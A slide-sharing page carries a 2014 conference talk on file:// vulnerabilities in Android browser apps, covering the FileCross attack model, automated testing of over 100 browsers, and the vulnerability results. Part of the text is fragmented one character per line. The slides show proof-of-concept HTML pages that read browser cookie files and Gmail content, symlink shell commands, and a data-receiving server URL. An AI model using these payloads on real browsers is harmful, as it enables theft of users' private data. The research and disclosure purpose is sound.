Analysis of file:// Vulnerabilities in Android Browser Apps

Analyzing Android Browser Apps for
file:// Vulnerabilities
Daoyuan Wu
 and Rocky Chang
Oct 13, 2014
The Hong Kong Polytechnic University
Information Security Conference (ISC)
1
f
ile://
 
It
 
is
 
a
 
standard
 
URI scheme
 
used
 
in
 
modern
browsers.
Like the well-known 
http://
 
and https://.
It
 
can
 
be
 
used
 
to
 
browse
 
local
 
files.
2
Unfortunately, file:// is an 
enemy
of the mobile security model
3
Mobile Security Model:
Sandbox-based App Isolation
4
App A
App B
 
app boundary
Sensitive
files
However, file:// requests may
break the app data isolation
5
App A
App B
app boundary
Sensitive
files
 
file://
 
stolen files
 
file://
vulnerabilities
An Empirical Study on file://
Vulnerabilities in Android Browser Apps
6
A unified attack model,
FileCross
Automated testing of
Android Browsers
Vulnerability results:
64 vulnerable browsers
177 FileCross issues
Across different
system versions
and web engines
Further analysis:
analyze 10 patches and
current file:// practices
The FileCross attacks
7
 
Auto-downloaded to the SD card
.
Victim
Browser
Exposed
Browsing
Interface
 
file:///data/data/pkg/dir/Cookies
 
file:///path/attack2.html
 
file:///path/attack4.html
 
file:///path/attack3.html
Attack
App
attack4.html
 
 
 
 
 
 
 
 
 
 
 
 
<
h
t
m
l
>
<
b
o
d
y
>
<
h
1
>
a
t
t
a
c
k
2
<
/
h
1
>
<
s
c
r
i
p
t
>
v
a
r
 
a
i
m
 
=
 
'
/
d
a
t
a
/
d
a
t
a
/
p
k
g
/
d
i
r
/
C
o
o
k
i
e
s
'
;
f
u
n
c
t
i
o
n
 
s
e
n
d
F
i
l
e
(
t
x
t
)
 
{
 
 
}
v
a
r
 
x
h
r
 
=
 
n
e
w
 
X
M
L
H
t
t
p
R
e
q
u
e
s
t
(
)
;
x
h
r
.
o
n
r
e
a
d
y
s
t
a
t
e
c
h
a
n
g
e
 
=
 
f
u
n
c
t
i
o
n
(
)
 
{
 
 
 
 
i
f
 
(
x
h
r
.
r
e
a
d
y
S
t
a
t
e
 
=
=
 
4
)
{
 
 
 
 
 
 
 
 
s
e
n
d
F
i
l
e
(
x
h
r
.
r
e
s
p
o
n
s
e
T
e
x
t
)
;
 
 
 
 
}
}
;
x
h
r
.
o
p
e
n
(
'
G
E
T
'
,
 
a
i
m
)
;
x
h
r
.
s
e
n
d
(
n
u
l
l
)
;
<
s
c
r
i
p
t
>
<
/
b
o
d
y
>
<
/
h
t
m
l
>
 
 
 
 
 
 
 
 
 
<
h
t
m
l
>
<
b
o
d
y
>
<
h
1
>
a
t
t
a
c
k
4
<
/
h
1
>
<
s
c
r
i
p
t
>
v
a
r
 
a
i
m
 
=
 
d
o
c
u
m
e
n
t
.
U
R
L
;
f
u
n
c
t
i
o
n
 
s
e
n
d
F
i
l
e
(
t
x
t
)
 
{
 
 
}
s
e
t
T
i
m
e
o
u
t
(
f
u
n
c
t
i
o
n
(
)
 
{
 
 
 
 
v
a
r
 
x
h
r
 
=
 
n
e
w
 
X
M
L
H
t
t
p
R
e
q
u
e
s
t
(
)
;
 
 
 
 
x
h
r
.
o
n
l
o
a
d
 
=
 
f
u
n
c
t
i
o
n
(
)
 
 
 
 
{
 
 
 
 
s
e
n
d
F
i
l
e
(
x
h
r
.
 
r
e
s
p
o
n
s
e
T
e
x
t
)
;
 
 
 
 
}
;
 
 
 
 
x
h
r
.
o
p
e
n
(
'
G
E
T
'
,
 
a
i
m
)
;
 
 
 
 
x
h
r
.
s
e
n
d
(
n
u
l
l
)
;
}
,
 
8
0
0
0
)
;
 
 
 
 
 
 
 
 
 
 
 
 
<
s
c
r
i
p
t
>
<
/
b
o
d
y
>
<
/
h
t
m
l
>
The External file:// Browsing Requests
 
 
 
 
 
 
 
 
 
 
 
 
<
h
t
m
l
>
<
b
o
d
y
>
<
h
1
>
a
t
t
a
c
k
3
<
/
h
1
>
<
s
c
r
i
p
t
>
v
a
r
 
a
i
m
 
=
 
'
h
t
t
p
s
:
/
/
m
a
i
l
.
g
o
o
g
l
e
.
c
o
m
'
;
f
u
n
c
t
i
o
n
 
s
e
n
d
F
i
l
e
(
t
x
t
)
 
{
 
 
}
v
a
r
 
x
h
r
 
=
 
n
e
w
 
X
M
L
H
t
t
p
R
e
q
u
e
s
t
(
)
;
x
h
r
.
o
n
r
e
a
d
y
s
t
a
t
e
c
h
a
n
g
e
 
=
 
f
u
n
c
t
i
o
n
(
)
 
{
 
 
 
 
i
f
 
(
x
h
r
.
r
e
a
d
y
S
t
a
t
e
 
=
=
 
4
)
{
 
 
 
 
 
 
 
 
s
e
n
d
F
i
l
e
(
x
h
r
.
r
e
s
p
o
n
s
e
T
e
x
t
)
;
 
 
 
 
}
}
;
x
h
r
.
o
p
e
n
(
'
G
E
T
'
,
 
a
i
m
)
;
x
h
r
.
s
e
n
d
(
n
u
l
l
)
;
<
s
c
r
i
p
t
>
<
/
b
o
d
y
>
<
/
h
t
m
l
>
(A4)
(A2)
(A3)
(A1)
attack3.html
attack2.html
Thread.sleep(
4000
);
rm
 /path/attack4.html
ln –s 
/.../Cookies /
path/attack4.html
Cmd 4
Cmd 1
 
Execute Cmd 4
attack2
.html
Cookies
Compromise SOP
on the “host” level
attack3
.html
http(s)://
content
Compromise SOP
on the “protocol” level
attack4
.html
docume
nt.URL
Cookies
Compromise SOP
via symbolic links
Automated Testing of
Android Browsers
Test
 
over
 
100
 
Android
 
browsers
 
in
 
less
 
than
 
four
 
hours
(in
 
multiple
 
devices
 
concurrently)
8
The Architecture and Workflow of
Our Testing System
9
The Major Testing Steps
 
Identifying Exposed Browsing Interfaces (EBI)
 
Propose a lightweight but effective scoring
mechanism
Score each component based on our summarized
EBI patterns
Select the component with a maximal score as the
EBI
10
Can 
accurately
 identify the EBIs in 113 browsers
out of the tested 116 browsers.
 
* The remaining three are: one is add-on, and the other two do not expose browsing interfaces.
The Major Testing Steps
 
Warming up browsers and finding target
sensitive files
 
The goal of warming up browsers is to
produce some private files.
Then our system continues to find target
sensitive files from the newly generated
private files.
11
“cookie", “password",
“bookmark"
The Major Testing Steps
Automatic attack validation and characterization
 
We cannot rely on naked-
eye inspection.
 
Embed five patterns into
the attack requests.
Web Receiver automatically
interprets them.
12
http://ourserver.com/send
?pkg=   
    
app pkg name
&atk=      
attack ID
&ver=      
device version
&con=      
contents
&kid=       
a key ID
Our Findings
1) Vulnerability results
2) Vulnerability distribution
3) Further analysis
13
Overall Vulnerability Results
14
 
More than half of the browsers tested are vulnerable to
the FileCross attacks. (64 vulnerable browsers)
50% of the most popular browsers are also vulnerable
(such as Firefox, Baidu, and Maxthon).
Representative Vulnerable Browsers
 
15
 
The file:// vulnerabilities are
exploitable in all Android versions.
 
A2 and A3 most affect Android 4.0.
But Android 4.3 still has over 30
issues of A2 and A3.
 
Android 4.4 which employs Chrome-
based web engine is still exploitable
by A2, A3, A4.
 
A4 has no engine-level patch in 4.4.
Vulnerability Distribution:
Across Different System Versions
16
Vulnerability Distribution:
Across Different Web Engines
 
Among 15 browsers that employ custom
engines, three are vulnerable.
 
Firefox: 
libmozglue.so
UC Browser HD: 
libWebCore_UC.so
Sogou: 
libsogouwebcore.so
17
This demonstrates our automated system is valuable to test
browsers which may adopt different engines.
Patch Analysis
We have devoted considerable efforts
 
on
reporting our identified vulnerabilities.
18
The Current Practice
on Exposed Browsing Interfaces
19
A breakdown of exposed browsing interfaces in the 115 tested browsers
The Current Practice
on file:// Support in Android Browsers
20
 
65% 
of the browsers accept external file://
browsing requests.
 
62% 
even allow file:// access to the private file
zones.
We believe this practice should be forbidden in
the mobile environment.
 
63% 
support JavaScript execution in file://
URLs.
Some Good Practice
 
Examples
on file:// Support in Android Browsers
21
 
file:// is generally not supported in lightweight and
dedicated browsers (which spares them from the
FileCross attacks).
 
Several popular browsers already forbid file:// access to
private file zones.
(Chrome, Dolphin, UC, Yandex browsers)
 
Three browsers have actively disabled the JavaScript
execution in file:// URLS.
Q & A
My homepage:
https://daoyuan14.github.io/
22
Exposed Browsing Interfaces (EBI)
Patterns
 
23
Four
 
Types
 
of
 
FileCross
 
Attacks
24
We are the first to identify them as a unified attack model (i.e.,
FileCross) and conduct automated testing to analyze their
prevalence in Android browsers.
Slide Note
Embed
Share

The study delves into file:// vulnerabilities in Android browser apps, uncovering risks posed by the file:// URI scheme. It highlights how file:// requests can breach app data isolation, potentially compromising sensitive files. The research presents a unified attack model, FileCross automated testing results, and analysis of patches and current practices to mitigate these vulnerabilities.


Uploaded on Sep 09, 2024 | 0 Views


Download Presentation

Please find below an Image/Link to download the presentation.

The content on the website is provided AS IS for your information and personal use only. It may not be sold, licensed, or shared on other websites without obtaining consent from the author. Download presentation by click this link. If you encounter any issues during the download, it is possible that the publisher has removed the file from their server.

E N D

Presentation Transcript


  1. Information Security Conference (ISC) Analyzing Android Browser Apps for file:// Vulnerabilities Daoyuan Wu and Rocky Chang Oct 13, 2014 The Hong Kong Polytechnic University 1

  2. file:// It is a standard URI scheme used in modern browsers. Like the well-known http:// and https://. It can be used to browse local files. 2

  3. Unfortunately, file:// is an enemy of the mobile security model 3

  4. Mobile Security Model: Sandbox-based App Isolation app boundary App A App B Sensitive files 4

  5. However, file:// requests may break the app data isolation app boundary App A App B Sensitive files file:// file:// vulnerabilities stolen files 5

  6. An Empirical Study on file:// Vulnerabilities in Android Browser Apps A unified attack model, FileCross Automated testing of Android Browsers Vulnerability results: 64 vulnerable browsers 177 FileCross issues Across different system versions and web engines Further analysis: analyze 10 patches and current file:// practices 6

  7. file:///data/data/pkg/dir/Cookies file:///path/attack2.html <html><body><h1>attack2</h1><script> var aim = '/data/data/pkg/dir/Cookies'; function sendFile(txt) { } var xhr = new XMLHttpRequest(); xhr.onreadystatechange = function() { if (xhr.readyState == 4){ sendFile(xhr.responseText); } }; xhr.open('GET', aim); xhr.send(null); <script></body></html> attack2 .html Auto-downloaded to the SD card. Cookies The FileCross attacks Execute Cmd 1 Attack App Victim Browser Compromise SOP on the host level Thread.sleep(3000); filepath = findFileInSDcard("Cookies"); if (filepath) readFileFromSDcard(filepath); attack2.html Exposed Browsing Interface (A1) (A2) attack3.html The External file:// Browsing Requests attack4.html (A3) (A4) Private File Zone file:///path/attack3.html file:///path/attack4.html <html><body><h1>attack4</h1><script> var aim = document.URL; function sendFile(txt) { } setTimeout(function() { var xhr = new XMLHttpRequest(); xhr.onload = function() { sendFile(xhr. responseText); }; xhr.open('GET', aim); xhr.send(null); }, 8000); <script></body></html> Cookies Compromise SOP via symbolic links Cmd 1 <html><body><h1>attack3</h1><script> var aim = 'https://mail.google.com'; function sendFile(txt) { } var xhr = new XMLHttpRequest(); xhr.onreadystatechange = function() { if (xhr.readyState == 4){ sendFile(xhr.responseText); } }; xhr.open('GET', aim); xhr.send(null); <script></body></html> Sensitive files Cmd 4 attack3 .html http(s):// content attack4 .html docume nt.URL Compromise SOP on the protocol level Execute Cmd 4 Thread.sleep(4000); rm /path/attack4.html ln s /.../Cookies /path/attack4.html 7

  8. Automated Testing of Android Browsers Test over 100 Android browsers in less than four hours (in multiple devices concurrently) 8

  9. The Architecture and Workflow of Our Testing System 9

  10. The Major Testing Steps Identifying Exposed Browsing Interfaces (EBI) Propose a lightweight but effective scoring mechanism Score each component based on our summarized EBI patterns Select the component with a maximal score as the EBI Can accurately identify the EBIs in 113 browsers out of the tested 116 browsers. * The remaining three are: one is add-on, and the other two do not expose browsing interfaces. 10

  11. The Major Testing Steps Warming up browsers and finding target sensitive files The goal of warming up browsers is to produce some private files. Then our system continues to find target sensitive files from the newly generated private files. cookie", password", bookmark" 11

  12. The Major Testing Steps Automatic attack validation and characterization We cannot rely on naked- eye inspection. Embed five patterns into the attack requests. Web Receiver automatically interprets them. http://ourserver.com/send ?pkg= app pkg name &atk= attack ID &ver= device version &con= contents &kid= a key ID 12

  13. Our Findings 1) Vulnerability results 2) Vulnerability distribution 3) Further analysis 13

  14. Overall Vulnerability Results More than half of the browsers tested are vulnerable to the FileCross attacks. (64 vulnerable browsers) 50% of the most popular browsers are also vulnerable (such as Firefox, Baidu, and Maxthon). 14

  15. Representative Vulnerable Browsers 15

  16. Vulnerability Distribution: Across Different System Versions The file:// vulnerabilities are exploitable in all Android versions. A2 and A3 most affect Android 4.0. But Android 4.3 still has over 30 issues of A2 and A3. Android 4.4 which employs Chrome- based web engine is still exploitable by A2, A3, A4. A4 has no engine-level patch in 4.4. 16

  17. Vulnerability Distribution: Across Different Web Engines Among 15 browsers that employ custom engines, three are vulnerable. Firefox: libmozglue.so UC Browser HD: libWebCore_UC.so Sogou: libsogouwebcore.so This demonstrates our automated system is valuable to test browsers which may adopt different engines. 17

  18. Patch Analysis We have devoted considerable efforts on reporting our identified vulnerabilities. 18

  19. The Current Practice on Exposed Browsing Interfaces A breakdown of exposed browsing interfaces in the 115 tested browsers 19

  20. The Current Practice on file:// Support in Android Browsers 65% of the browsers accept external file:// browsing requests. 62% even allow file:// access to the private file zones. We believe this practice should be forbidden in the mobile environment. 63% support JavaScript execution in file:// URLs. 20

  21. Some Good Practice Examples on file:// Support in Android Browsers file:// is generally not supported in lightweight and dedicated browsers (which spares them from the FileCross attacks). Several popular browsers already forbid file:// access to private file zones. (Chrome, Dolphin, UC, Yandex browsers) Three browsers have actively disabled the JavaScript execution in file:// URLS. 21

  22. Q & A My homepage: https://daoyuan14.github.io/ 22

More Related Content

giItT1WQy@!-/#giItT1WQy@!-/#giItT1WQy@!-/#giItT1WQy@!-/#giItT1WQy@!-/#giItT1WQy@!-/#giItT1WQy@!-/#